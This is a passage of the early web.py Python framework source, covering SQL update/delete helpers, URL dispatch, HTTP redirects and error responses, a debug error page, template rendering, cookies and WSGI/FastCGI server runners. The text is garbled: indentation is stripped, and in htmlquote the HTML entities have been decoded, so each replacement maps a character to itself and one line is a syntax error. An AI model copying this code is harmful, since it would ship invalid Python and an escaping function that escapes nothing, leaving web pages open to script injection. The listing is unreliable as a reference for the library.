elif ctx.db_name == "mysql":
ctx.db_execute(db_cursor, sql_query, v)
sql_query = "SELECT last_insert_id()"
v = ()
elif ctx.db_name == "sqlite":
ctx.db_execute(db_cursor, sql_query, v)
# not really the same...
sql_query = "SELECT last_insert_rowid()"
v = ()
ctx.db_execute(db_cursor, sql_query, v)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not ctx.db_transaction:
ctx.db.commit()
return out
def update(tables, where, vars=None, **values):
"""
Update `tables` with clause `where` (interpolated using `vars`)
and setting `values`.
"""
if vars is None:
vars = {}
if isinstance(where, (int, long)):
vars = [where]
where = "id = " + aparam()
elif isinstance(where, (list, tuple)) and len(where) == 2:
where, vars = where
else:
where, vars = reparam(where, vars)
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, "UPDATE %s SET %s WHERE %s" % (
sqllist(tables),
', '.join([k + '=' + aparam() for k in values.keys()]),
where),
values.values() + vars)
if not ctx.db_transaction:
ctx.db.commit()
return db_cursor.rowcount
def delete(table, where, using=None, vars=None):
"""
Deletes from `table` with clauses `where` and `using`.
"""
if vars is None:
vars = {}
db_cursor = ctx.db.cursor()
if isinstance(where, (int, long)):
vars = [where]
where = "id = " + aparam()
elif isinstance(where, (list, tuple)) and len(where) == 2:
where, vars = where
else:
where, vars = reparam(where, vars)
q = 'DELETE FROM %s WHERE %s' % (table, where)
if using:
q += ' USING ' + sqllist(using)
ctx.db_execute(db_cursor, q, vars)
if not ctx.db_transaction:
ctx.db.commit()
return db_cursor.rowcount
## Request Handlers
def handle(mapping, fvars=None):
"""
Call the appropriate function based on the url to function mapping in `mapping`.
If no module for the function is specified, look up the function in `fvars`. If
`fvars` is empty, use the caller's context.
`mapping` should be a tuple of paired regular expressions with function name
substitutions. `handle` will import modules as necessary.
"""
for url, ofno in group(mapping, 2):
if isinstance(ofno, tuple):
ofn, fna = ofno[0], list(ofno[1:])
else:
ofn, fna = ofno, []
fn, result = re_subm('^' + url + '$', ofn, ctx.path)
if result: # it's a match
if fn.split(' ', 1)[0] == "redirect":
url = fn.split(' ', 1)[1]
if ctx.method == "GET":
x = ctx.env.get('QUERY_STRING', '')
if x:
url += '?' + x
return redirect(url)
elif '.' in fn:
x = fn.split('.')
mod, cls = '.'.join(x[:-1]), x[-1]
mod = __import__(mod, globals(), locals(), [""])
cls = getattr(mod, cls)
else:
cls = fn
mod = fvars or upvars()
if isinstance(mod, types.ModuleType):
mod = vars(mod)
try:
cls = mod[cls]
except KeyError:
return notfound()
meth = ctx.method
if meth == "HEAD":
if not hasattr(cls, meth):
meth = "GET"
if not hasattr(cls, meth):
return nomethod(cls)
tocall = getattr(cls(), meth)
args = list(result.groups())
for d in re.findall(r'\\(\d+)', ofn):
args.pop(int(d) - 1)
return tocall(*([urllib.unquote(x) for x in args] + fna))
return notfound()
def autodelegate(prefix=''):
"""
Returns a method that takes one argument and calls the method named prefix+arg,
calling `notfound()` if there isn't one. Example:
urls = ('/prefs/(.*)', 'prefs')
class prefs:
GET = autodelegate('GET_')
def GET_password(self): pass
def GET_privacy(self): pass
`GET_password` would get called for `/prefs/password` while `GET_privacy`
gets called for `/prefs/privacy`.
If a user visits `/prefs/password/change` then `GET_password(self, '/change')`
is called.
"""
def internal(self, arg):
if '/' in arg:
first, rest = arg.split('/', 1)
func = prefix + first
args = ['/' + rest]
else:
func = prefix + arg
args = []
if hasattr(self, func):
try:
return getattr(self, func)(*args)
except TypeError:
return notfound()
else:
return notfound()
return internal
def background(func):
"""A function decorator to run a long-running function as a background thread."""
def internal(*a, **kw):
data() # cache it
ctx = _context[currentThread()]
_context[currentThread()] = storage(ctx.copy())
def newfunc():
_context[currentThread()] = ctx
func(*a, **kw)
t = threading.Thread(target=newfunc)
background.threaddb[id(t)] = t
t.start()
ctx.headers = []
return seeother(changequery(_t=id(t)))
return internal
background.threaddb = {}
def backgrounder(func):
def internal(*a, **kw):
i = input(_method='get')
if '_t' in i:
try:
t = background.threaddb[int(i._t)]
except KeyError:
return notfound()
_context[currentThread()] = _context[t]
return
else:
return func(*a, **kw)
return internal
## HTTP Functions
def httpdate(date_obj):
"""Formats a datetime object for use in HTTP headers."""
return date_obj.strftime("%a, %d %b %Y %H:%M:%S GMT")
def parsehttpdate(string_):
"""Parses an HTTP date into a datetime object."""
try:
t = time.strptime(string_, "%a, %d %b %Y %H:%M:%S %Z")
except ValueError:
return None
return datetime.datetime(*t[:6])
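# Editor's illustrative sketch (not part of web.py): HTTP date formatting.
# Note: %a/%b are locale-dependent; this sketch assumes the C/English locale.
def _example_httpdate_usage():
    d = datetime.datetime(2009, 2, 13, 23, 31, 30)
    assert httpdate(d) == 'Fri, 13 Feb 2009 23:31:30 GMT'
    # parsehttpdate() is the inverse, returning None for strings it can't parse.
    assert parsehttpdate('not a date') is None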
def expires(delta):
"""
Outputs an `Expires` header for `delta` from now.
`delta` is a `timedelta` object or a number of seconds.
"""
try:
datetime
except NameError:
raise Exception, "requires Python 2.3 or later"
if isinstance(delta, (int, long)):
delta = datetime.timedelta(seconds=delta)
date_obj = datetime.datetime.utcnow() + delta
header('Expires', httpdate(date_obj))
def lastmodified(date_obj):
"""Outputs a `Last-Modified` header for `datetime`."""
header('Last-Modified', httpdate(date_obj))
def modified(date=None, etag=None):
n = ctx.env.get('HTTP_IF_NONE_MATCH')
m = parsehttpdate(ctx.env.get('HTTP_IF_MODIFIED_SINCE', '').split(';')[0])
validate = False
if etag:
raise NotImplementedError, "no etag support yet"
# should really be a warning
if date and m:
# we subtract a second because
# HTTP dates don't have sub-second precision
if date-datetime.timedelta(seconds=1) <= m:
validate = True
if validate: ctx.status = '304 Not Modified'
return not validate
"""
By default, these handlers send very short error messages (like "bad request")
to the user. They can and should be overridden
to return nicer ones.
"""
def redirect(url, status='301 Moved Permanently'):
"""
Returns a `status` redirect to the new URL.
`url` is joined with the base URL so that things like
`redirect("about") will work properly.
"""
newloc = urlparse.urljoin(ctx.home + ctx.path, url)
ctx.status = status
ctx.output = ''
header('Content-Type', 'text/html')
header('Location', newloc)
# seems to add a three-second delay for some reason:
# output('<a href="'+ newloc + '">moved permanently</a>')
def found(url):
"""A `302 Found` redirect."""
return redirect(url, '302 Found')
def seeother(url):
"""A `303 See Other` redirect."""
return redirect(url, '303 See Other')
def tempredirect(url):
"""A `307 Temporary Redirect` redirect."""
return redirect(url, '307 Temporary Redirect')
def badrequest():
"""Return a `400 Bad Request` error."""
ctx.status = '400 Bad Request'
header('Content-Type', 'text/html')
return output('bad request')
def notfound():
"""Returns a `404 Not Found` error."""
ctx.status = '404 Not Found'
header('Content-Type', 'text/html')
return output('not found')
def nomethod(cls):
"""Returns a `405 Method Not Allowed` error for `cls`."""
ctx.status = '405 Method Not Allowed'
header('Content-Type', 'text/html')
header('Allow', \
', '.join([method for method in \
['GET', 'HEAD', 'POST', 'PUT', 'DELETE'] \
if hasattr(cls, method)]))
# commented out for the same reason redirect is
# return output('method not allowed')
def gone():
"""Returns a `410 Gone` error."""
ctx.status = '410 Gone'
header('Content-Type', 'text/html')
return output("gone")
def internalerror():
"""Returns a `500 Internal Server` error."""
ctx.status = "500 Internal Server Error"
ctx.headers = [('Content-Type', 'text/html')]
ctx.output = "internal server error"
# adapted from Django <djangoproject.com>
# Copyright (c) 2005, the Lawrence Journal-World
# Used under the modified BSD license:
# http://www.xfree86.org/3.3.6/COPYRIGHT2.html#5
DJANGO_500_PAGE = """#import inspect
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>$exception_type at $ctx.path</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table {
border:1px solid #ccc; border-collapse: collapse; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%;}
table td.code div { overflow:hidden; }
table.source th { color:#666; }
table.source td {
font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; }
ul.traceback li.frame { margin-bottom:1em; }
div.context { margin: 10px 0; }
div.context ol {
padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li {
font-family:monospace; white-space:pre; color:#666; cursor:pointer; }
div.context ol.context-line li { color:black; background-color:#ccc; }
div.context ol.context-line li span { float: right; }
div.commands { margin-left: 40px; }
div.commands a { color:black; text-decoration:none; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
</style>
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon;
// Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
//-->
</script>
</head>
<body>
<div id="summary">
<h1>$exception_type at $ctx.path</h1>
<h2>$exception_value</h2>
<table><tr>
<th>Python</th>
<td>$lastframe.filename in $lastframe.function, line $lastframe.lineno</td>
</tr><tr>
<th>Web</th>
<td>$ctx.method $ctx.home$ctx.path</td>
</tr></table>
</div>
<div id="traceback">
<h2>Traceback <span>(innermost first)</span></h2>
<ul class="traceback">
#for frame in $frames
<li class="frame">
<code>$frame.filename</code> in <code>$frame.function</code>
#if $frame.context_line
<div class="context" id="c$frame.id">
#if $frame.pre_context
<ol start="$frame.pre_context_lineno" class="pre-context" id="pre$frame.id">#for line in $frame.pre_context#<li onclick="toggle('pre$frame.id', 'post$frame.id')">$line</li>#end for#</ol>
#end if
<ol start="$frame.lineno" class="context-line"><li onclick="toggle('pre$frame.id', 'post$frame.id')">$frame.context_line <span>...</span></li></ol>
#if $frame.post_context
<ol start='$(frame.lineno+1)' class="post-context" id="post$frame.id">#for line in $frame.post_context#<li onclick="toggle('pre$frame.id', 'post$frame.id')">$line</li>#end for#</ol>
#end if
</div>
#end if
#if $frame.vars
<div class="commands">
<a href='#' onclick="return varToggle(this, '$frame.id')"><span>&#x25b6;</span> Local vars</a>## $inspect.formatargvalues(*inspect.getargvalues(frame['tb'].tb_frame))
</div>
<table class="vars" id="v$frame.id">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set frameitems = $frame.vars
#silent frameitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in frameitems
<tr>
<td>$key</td>
<td class="code"><div>$prettify(val)</div></td>
</tr>
#end for
</tbody>
</table>
#end if
</li>
#end for
</ul>
</div>
<div id="requestinfo">
#if $context_.output or $context_.headers
<h2>Response so far</h2>
<h3>HEADERS</h3>
#if $ctx.headers
<p class="req"><code>
#for (k, v) in $context_.headers
$k: $v<br />
#end for
</code></p>
#else
<p>No headers.</p>
#end if
<h3>BODY</h3>
<p class="req" style="padding-bottom: 2em"><code>
$context_.output
</code></p>
#end if
<h2>Request information</h2>
<h3>INPUT</h3>
#if $input_
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $input_.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in myitems
<tr>
<td>$key</td>
<td class="code"><div>$val</div></td>
</tr>
#end for
</tbody>
</table>
#else
<p>No input data.</p>
#end if
<h3 id="cookie-info">COOKIES</h3>
#if $cookies_
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#for (key, val) in $cookies_.items()
<tr>
<td>$key</td>
<td class="code"><div>$val</div></td>
</tr>
#end for
</tbody>
</table>
#else
<p>No cookie data</p>
#end if
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $context_.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in $myitems
#if not $key.startswith('_') and $key not in ['env', 'output', 'headers', 'environ', 'status', 'db_execute']
<tr>
<td>$key</td>
<td class="code"><div>$prettify($val)</div></td>
</tr>
#end if
#end for
</tbody>
</table>
<h3 id="meta-info">ENVIRONMENT</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $context_.env.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in $myitems
<tr>
<td>$key</td>
<td class="code"><div>$prettify($val)</div></td>
</tr>
#end for
</tbody>
</table>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>web.internalerror</code>
set to <code>web.debugerror</code>. Change that if you want a different one.
</p>
</div>
</body>
</html>"""
def djangoerror():
def _get_lines_from_file(filename, lineno, context_lines):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
try:
source = open(filename).readlines()
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = \
[line.strip('\n') for line in source[lower_bound:lineno]]
context_line = source[lineno].strip('\n')
post_context = \
[line.strip('\n') for line in source[lineno + 1:upper_bound]]
return lower_bound, pre_context, context_line, post_context
except (OSError, IOError):
return None, [], None, []
exception_type, exception_value, tback = sys.exc_info()
frames = []
while tback is not None:
filename = tback.tb_frame.f_code.co_filename
function = tback.tb_frame.f_code.co_name
lineno = tback.tb_lineno - 1
pre_context_lineno, pre_context, context_line, post_context = \
_get_lines_from_file(filename, lineno, 7)
frames.append({
'tback': tback,
'filename': filename,
'function': function,
'lineno': lineno,
'vars': tback.tb_frame.f_locals.items(),
'id': id(tback),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno,
})
tback = tback.tb_next
lastframe = frames[-1]
frames.reverse()
urljoin = urlparse.urljoin
input_ = input()
cookies_ = cookies()
context_ = ctx
def prettify(x):
try:
out = pprint.pformat(x)
except Exception, e:
out = '[could not display: <' + e.__class__.__name__ + \
': '+str(e)+'>]'
return out
return render(DJANGO_500_PAGE, asTemplate=True, isString=True)
def debugerror():
"""
A replacement for `internalerror` that presents a nice page with lots
of debug information for the programmer.
(Based on the beautiful 500 page from [Django](http://djangoproject.com/),
designed by [Wilson Miner](http://wilsonminer.com/).)
Requires [Cheetah](http://cheetahtemplate.org/).
"""
# need to do django first, so it can get the old stuff
if _hasTemplating:
out = str(djangoerror())
else:
# Cheetah isn't installed
out = """<p>You've set web.py to use the fancier debugerror error
messages, but these messages require you install the Cheetah template
system. For more information, see
<a href="http://webpy.org/">the web.py website</a>.</p>
<p>In the meantime, here's a plain old error message:</p>
<pre>%s</pre>
<p>(If it says something about 'Compiler', then it's probably
because you're trying to use templates and you haven't
installed Cheetah. See above.)</p>
""" % htmlquote(traceback.format_exc())
ctx.status = "500 Internal Server Error"
ctx.headers = [('Content-Type', 'text/html')]
ctx.output = out
## Rendering
r_include = re_compile(r'(?!\\)#include \"(.*?)\"($|#)', re.M)
def __compiletemplate(template, base=None, isString=False):
if isString:
text = template
else:
text = open('templates/'+template).read()
# implement #include at compile-time
def do_include(match):
text = open('templates/'+match.groups()[0]).read()
return text
while r_include.findall(text):
text = r_include.sub(do_include, text)
execspace = _compiletemplate.bases.copy()
tmpl_compiler = Compiler(source=text, mainClassName='GenTemplate')
tmpl_compiler.addImportedVarNames(execspace.keys())
exec str(tmpl_compiler) in execspace
if base:
_compiletemplate.bases[base] = execspace['GenTemplate']
return execspace['GenTemplate']
_compiletemplate = memoize(__compiletemplate)
_compiletemplate.bases = {}
def htmlquote(text):
"""Encodes `text` for raw use in HTML."""
text = text.replace("&", "&") # Must be done first!
text = text.replace("<", "<")
text = text.replace(">", ">")
text = text.replace("'", "'")
text = text.replace('"', """)
return text
def websafe(val):
"""
Converts `val` so that it's safe for use in HTML.
HTML metacharacters are encoded,
None becomes the empty string, and
unicode is converted to UTF-8.
"""
if val is None: return ''
if not isinstance(val, unicode): val = str(val)
return htmlquote(val)
if _hasTemplating:
class WebSafe(Filter):
def filter(self, val, **keywords):
return websafe(val)
def render(template, terms=None, asTemplate=False, base=None,
isString=False):
"""
Renders a template, caching where it can.
`template` is the name of a file containing the template in
the `templates/` folder, unless `isString`, in which case it's the
template itself.
`terms` is a dictionary used to fill the template. If it's None, then
the caller's local variables are used instead, plus `context` and `ctx` if
they're not already set.
If asTemplate is False, it `output`s the template directly. Otherwise,
it returns the template object.
If the template is a potential base template (that is, something other templates
can extend), then base should be a string with the name of the template. The
template will be cached and made available for future calls to `render`.
Requires [Cheetah](http://cheetahtemplate.org/).
"""
# terms=['var1', 'var2'] means grab those variables
if isinstance(terms, list):
new = {}
old = upvars()
for k in terms:
new[k] = old[k]
terms = new
# default: grab all locals
elif terms is None:
terms = {'context': context, 'ctx':ctx}
terms.update(sys._getframe(1).f_locals)
# terms=d means use d as the searchList
if not isinstance(terms, tuple):
terms = (terms,)
if not isString and template.endswith('.html'):
header('Content-Type','text/html; charset=utf-8', unique=True)
compiled_tmpl = _compiletemplate(template, base=base, isString=isString)
compiled_tmpl = compiled_tmpl(searchList=terms, filter=WebSafe)
if asTemplate:
return compiled_tmpl
else:
return output(str(compiled_tmpl))
## Input Forms
def input(*requireds, **defaults):
"""
Returns a `storage` object with the GET and POST arguments.
See `storify` for how `requireds` and `defaults` work.
"""
from cStringIO import StringIO
def dictify(fs): return dict([(k, fs[k]) for k in fs.keys()])
_method = defaults.pop('_method', 'both')
e = ctx.env.copy()
out = {}
if _method.lower() in ['both', 'post']:
a = {}
if e['REQUEST_METHOD'] == 'POST':
a = cgi.FieldStorage(fp = StringIO(data()), environ=e,
keep_blank_values=1)
a = dictify(a)
out = dictadd(out, a)
if _method.lower() in ['both', 'get']:
e['REQUEST_METHOD'] = 'GET'
a = dictify(cgi.FieldStorage(environ=e, keep_blank_values=1))
out = dictadd(out, a)
try:
return storify(out, *requireds, **defaults)
except KeyError:
badrequest()
raise StopIteration
def data():
"""Returns the data sent with the request."""
if 'data' not in ctx:
cl = intget(ctx.env.get('CONTENT_LENGTH'), 0)
ctx.data = ctx.env['wsgi.input'].read(cl)
return ctx.data
def changequery(**kw):
"""
Imagine you're at `/foo?a=1&b=2`. Then `changequery(a=3)` will return
`/foo?a=3&b=2` -- the same URL but with the arguments you requested
changed.
"""
query = input(_method='get')
for k, v in kw.iteritems():
if v is None:
query.pop(k, None)
else:
query[k] = v
out = ctx.path
if query:
out += '?' + urllib.urlencode(query)
return out
## Cookies
def setcookie(name, value, expires="", domain=None):
"""Sets a cookie."""
if expires < 0:
expires = -1000000000
kargs = {'expires': expires, 'path':'/'}
if domain:
kargs['domain'] = domain
# @@ should we limit cookies to a different path?
cookie = Cookie.SimpleCookie()
cookie[name] = value
for key, val in kargs.iteritems():
cookie[name][key] = val
header('Set-Cookie', cookie.items()[0][1].OutputString())
def cookies(*requireds, **defaults):
"""
Returns a `storage` object with all the cookies in it.
See `storify` for how `requireds` and `defaults` work.
"""
cookie = Cookie.SimpleCookie()
cookie.load(ctx.env.get('HTTP_COOKIE', ''))
try:
return storify(cookie, *requireds, **defaults)
except KeyError:
badrequest()
raise StopIteration
## WSGI Sugar
def header(hdr, value, unique=False):
"""
Adds the header `hdr: value` to the response.
If `unique` is True and a header with that name already exists,
it doesn't add a new one. If `unique` is None and a header with
that name already exists, it replaces it with this one.
"""
if unique is True:
for h, v in ctx.headers:
if h == hdr: return
elif unique is None:
ctx.headers = [h for h in ctx.headers if h[0] != hdr]
ctx.headers.append((hdr, value))
def output(string_):
"""Appends `string_` to the response."""
if isinstance(string_, unicode): string_ = string_.encode('utf8')
if ctx.get('flush'):
ctx._write(string_)
else:
ctx.output += str(string_)
def flush():
ctx.flush = True
return flush
def write(cgi_response):
"""
Converts a standard CGI-style string response into `header` and
`output` calls.
"""
cgi_response = str(cgi_response)
cgi_response = cgi_response.replace('\r\n', '\n')
head, body = cgi_response.split('\n\n', 1)
lines = head.split('\n')
for line in lines:
if line.isspace():
continue
hdr, value = line.split(":", 1)
value = value.strip()
if hdr.lower() == "status":
ctx.status = value
else:
header(hdr, value)
output(body)
def webpyfunc(inp, fvars=None, autoreload=False):
"""If `inp` is a url mapping, returns a function that calls handle."""
if not fvars:
fvars = upvars()
if not hasattr(inp, '__call__'):
if autoreload:
# black magic to make autoreload work:
mod = \
__import__(
fvars['__file__'].split(os.path.sep).pop().split('.')[0])
#@@probably should replace this with some inspect magic
name = dictfind(fvars, inp)
func = lambda: handle(getattr(mod, name), mod)
else:
func = lambda: handle(inp, fvars)
else:
func = inp
return func
def wsgifunc(func, *middleware):
"""Returns a WSGI-compatible function from a webpy-function."""
middleware = list(middleware)
if reloader in middleware:
relr = reloader(None)
relrcheck = relr.check
middleware.remove(reloader)
else:
relr = None
relrcheck = lambda: None
def wsgifunc(env, start_resp):
_load(env)
relrcheck()
try:
result = func()
except StopIteration:
result = None
is_generator = result and hasattr(result, 'next')
if is_generator:
# wsgi requires the headers first
# so we need to do an iteration
# and save the result for later
try:
firstchunk = result.next()
except StopIteration:
firstchunk = ''
status, headers, output = ctx.status, ctx.headers, ctx.output
ctx._write = start_resp(status, headers)
# and now, the fun:
def cleanup():
# we insert this little generator
# at the end of our itertools.chain
# so that it unloads the request
# when everything else is done
yield '' # force it to be a generator
_unload()
# result is the output of calling the webpy function
# it could be a generator...
if is_generator:
if firstchunk is flush:
# oh, it's just our special flush mode
# ctx._write is set up, so just continue execution
try:
result.next()
except StopIteration:
pass
_unload()
return []
else:
return itertools.chain([firstchunk], result, cleanup())
# ... but it's usually just None
#
# output is the stuff in ctx.output
# it's usually a string...
if isinstance(output, str): #@@ other stringlikes?
_unload()
return [output]
# it could be a generator...
elif hasattr(output, 'next'):
return itertools.chain(output, cleanup())
else:
_unload()
raise Exception, "Invalid web.ctx.output"
for mw_func in middleware:
wsgifunc = mw_func(wsgifunc)
if relr:
relr.func = wsgifunc
return wsgifunc
return wsgifunc
def run(inp, *middleware):
"""
Starts handling requests. If called in a CGI or FastCGI context, it will follow
that protocol. If called from the command line, it will start an HTTP
server on the port named in the first command line argument, or, if there
is no argument, on port 8080.
    If `inp` is a callable, it's called with no arguments.
    Otherwise, it's a `mapping` object to be passed to `handle(...)`.
    **Caveat:** So that `reloader` will work correctly, `inp` has to be a variable;
    it can't be a tuple passed in directly.
`middleware` is a list of WSGI middleware which is applied to the resulting WSGI
function.
"""
autoreload = reloader in middleware
fvars = upvars()
return runwsgi(wsgifunc(webpyfunc(inp, fvars, autoreload), *middleware))
def runwsgi(func):
"""
Runs a WSGI-compatible function using FCGI, SCGI, or a simple web server,
as appropriate.
"""
#@@ improve detection
if os.environ.has_key('SERVER_SOFTWARE'): # cgi
os.environ['FCGI_FORCE_CGI'] = 'Y'
if (os.environ.has_key('PHP_FCGI_CHILDREN') #lighttpd fastcgi
or os.environ.has_key('SERVER_SOFTWARE')
or 'fcgi' in sys.argv or 'fastcgi' in sys.argv):
return runfcgi(func)
if 'scgi' in sys.argv:
return runscgi(func)
# command line:
return runsimple(func, validip(listget(sys.argv, 1, '')))
def runsimple(func, server_address=("0.0.0.0", 8080)):
"""
Runs a simple HTTP server hosting WSGI app `func`. The directory `static/`
is hosted statically.
Based on [WsgiServer][ws] from [Colin Stewart][cs].
[ws]: http://www.owlfish.com/software/wsgiutils/documentation/wsgi-server-api.html
[cs]: http://www.owlfish.com/
"""
# Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
# Modified somewhat for simplicity
# Used under the modified BSD license:
# http://www.xfree86.org/3.3.6/COPYRIGHT2.html#5
import SimpleHTTPServer, SocketServer, BaseHTTPServer, urlparse
import socket, errno
import traceback
class WSGIHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def run_wsgi_app(self):
protocol, host, path, parameters, query, fragment = \
urlparse.urlparse('http://dummyhost%s' % self.path)
# we only use path, query
env = {'wsgi.version': (1, 0)
,'wsgi.url_scheme': 'http'
,'wsgi.input': self.rfile
,'wsgi.errors': sys.stderr
,'wsgi.multithread': 1
,'wsgi.multiprocess': 0
,'wsgi.run_once': 0
,'REQUEST_METHOD': self.command
,'REQUEST_URI': self.path
,'PATH_INFO': path
,'QUERY_STRING': query
,'CONTENT_TYPE': self.headers.get('Content-Type', '')
,'CONTENT_LENGTH': self.headers.get('Content-Length', '')
,'REMOTE_ADDR': self.client_address[0]
,'SERVER_NAME': self.server.server_address[0]
,'SERVER_PORT': str(self.server.server_address[1])
,'SERVER_PROTOCOL': self.request_version
}
for http_header, http_value in self.headers.items():
env ['HTTP_%s' % http_header.replace('-', '_').upper()] = \
http_value
# Setup the state
self.wsgi_sent_headers = 0
self.wsgi_headers = []
try:
                # We have the environment, now invoke the application
result = self.server.app(env, self.wsgi_start_response)
try:
try:
for data in result:
if data:
self.wsgi_write_data(data)
finally:
if hasattr(result, 'close'):
result.close()
except socket.error, socket_err:
# Catch common network errors and suppress them
if (socket_err.args[0] in \
(errno.ECONNABORTED, errno.EPIPE)):
return
except socket.timeout, socket_timeout:
return
except:
print >> debug, traceback.format_exc(),
internalerror()
if not self.wsgi_sent_headers:
self.wsgi_start_response(ctx.status, ctx.headers)
self.wsgi_write_data(ctx.output)
if (not self.wsgi_sent_headers):
# We must write out something!
self.wsgi_write_data(" ")
return
do_POST = run_wsgi_app
do_PUT = run_wsgi_app
do_DELETE = run_wsgi_app
def do_GET(self):
if self.path.startswith('/static/'):
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
else:
self.run_wsgi_app()
def wsgi_start_response(self, response_status, response_headers,
exc_info=None):
if (self.wsgi_sent_headers):
raise Exception \
("Headers already sent and start_response called again!")
# Should really take a copy to avoid changes in the application....
self.wsgi_headers = (response_status, response_headers)
return self.wsgi_write_data
def wsgi_write_data(self, data):
if (not self.wsgi_sent_headers):
status, headers = self.wsgi_headers
# Need to send header prior to data
                status_code = status[:status.find(' ')]
                status_msg = status[status.find(' ') + 1:]
self.send_response(int(status_code), status_msg)
for header, value in headers:
self.send_header(header, value)
self.end_headers()
self.wsgi_sent_headers = 1
# Send the data
self.wfile.write(data)
class WSGIServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def __init__(self, func, server_address):
BaseHTTPServer.HTTPServer.__init__(self,
server_address,
WSGIHandler)
self.app = func
self.serverShuttingDown = 0
print "Launching server: http://%s:%d/" % server_address
WSGIServer(func, server_address).serve_forever()
def makeserver(wsgi_server):
"""Updates a flup-style WSGIServer with web.py-style error support."""
class MyServer(wsgi_server):
def error(self, req):
w = req.stdout.write
internalerror()
w('Status: ' + ctx.status + '\r\n')
for (h, v) in ctx.headers:
w(h + ': ' + v + '\r\n')
w('\r\n' + ctx.output)
return MyServer
def runfcgi(func):
"""Runs a WSGI-function with a FastCGI server."""
from flup.server.fcgi import WSGIServer
    if len(sys.argv) > 2: # progname, fcgi, hostport
args = sys.argv[:]
if 'fastcgi' in args: args.remove('fastcgi')
elif 'fcgi' in args: args.remove('fcgi')
hostport = validaddr(args[1])
elif len(sys.argv) > 1:
hostport = ('localhost', 8000)
else:
hostport = None
return makeserver(WSGIServer)(func, multiplexed=True, bindAddress=hostport).run()
def runscgi(func):
"""Runs a WSGI-function with an SCGI server."""
from flup.server.scgi import WSGIServer
my_server = makeserver(WSGIServer)
if len(sys.argv) > 2: # progname, scgi
args = sys.argv[:]
args.remove('scgi')
hostport = validaddr(args[1])
else:
hostport = ('localhost', 4000)
return my_server(func, bindAddress=hostport).run()
## Debugging
def debug(*args):
"""
Prints a prettyprinted version of `args` to stderr.
"""
try:
out = ctx.environ['wsgi.errors']
except:
out = sys.stderr
for arg in args:
print >> out, pprint.pformat(arg)
return ''
def debugwrite(x):
"""writes debug data to error stream"""
try:
out = ctx.environ['wsgi.errors']
except:
out = sys.stderr
out.write(x)
debug.write = debugwrite
